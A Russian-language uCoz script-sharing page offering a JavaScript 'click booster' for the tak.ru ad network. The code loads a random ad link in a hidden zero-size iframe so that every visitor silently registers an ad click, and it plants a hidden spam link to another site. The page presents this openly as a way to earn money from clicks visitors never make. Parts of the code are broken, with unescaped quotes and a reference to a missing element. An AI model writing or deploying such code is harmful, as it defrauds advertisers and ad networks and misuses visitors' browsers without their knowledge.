Например: Сервер CS 1.6
Понедельник, 29.04.2024, 14:09 Регистрация Карта сайта RSS Лента
Меню сайта
Все для CS
Все для Ucoz
Программы для ПК
Все для Minecraft
Все для Vice City
Все для SAMP
Реклама
Место Под Ссылки
Главная » Файлы » Все для Ucoz » Скрипты

Скрипт накрутки кликов tak.ru

Принцип скрипта очень прост, человек заходит на ваш сайт и если даже он не будет кликать по рекламе, скрипт сделает это за него, принося тем самым вам деньги




Код
<div id="areaLinks">  

  вот сюда вставляйте код который дают вам на tak.ru  

  </div>  
  <script>  
  function SetCookie(cookieName,cookieContent){  
  var cookiePath = '/';  
  var expDate=new Date();  
  expDate.setTime(expDate.getTime()+100*60*60*24*10);  
  var expires=expDate.toGMTString();  
  document.cookie=cookieName+"="+escape(cookieContent)+";path="+escape(cookiePath)+";expires="+expires;  
  }  
  function GetCookie(cookieName){  
  var ourCookie=document.cookie  
  if(!ourCookie || ourCookie=="")return ""  
  ourCookie=ourCookie.split(";")  
  var i=0  
  var Cookie  
  while(i<ourCookie.length){  
  Cookie=ourCookie[i].split("=")[0]  
  if(Cookie.charAt(0)==" ")  
  Cookie=Cookie.substring(1)  
  if(Cookie==cookieName){  
  return unescape(ourCookie[i].split("=")[1])  
  }  
  i++  
  }  
  return ""  
  }  
  if(!GetCookie('waser2')){  
  j=Math.random()*11;  
  j=Math.round(j);  
  if(j<3)j=3;  
  var ng=document.getElementById('areaLinks').getElementsByTagName('a');  

  document.write("<div style='display:none'><iframe src='"+ng[j]+"' width=0 height=0></iframe><div style="display:none;"><a href="http://oi-e.com/">скачать бесплатно</a></div></div>"); SetCookie("waser2", "gdf");  
  } if(!GetCookie('waser5')){  
  j=Math.random()*11;  
  j=Math.round(j);  
  if(j<3)j=3;  
  var ng=document.getElementById('areaLinks2').getElementsByTagName('a');  
  document.write("<div style='display:none'><iframe src='"+ng[j]+"' width=0 height=0></iframe></div>");  
  SetCookie("waser5", "gdf");  
  }  
  </script>
Всего комментариев: 0
Добавить комментарий
Имя *:
Email:
Подписка:1
Код *: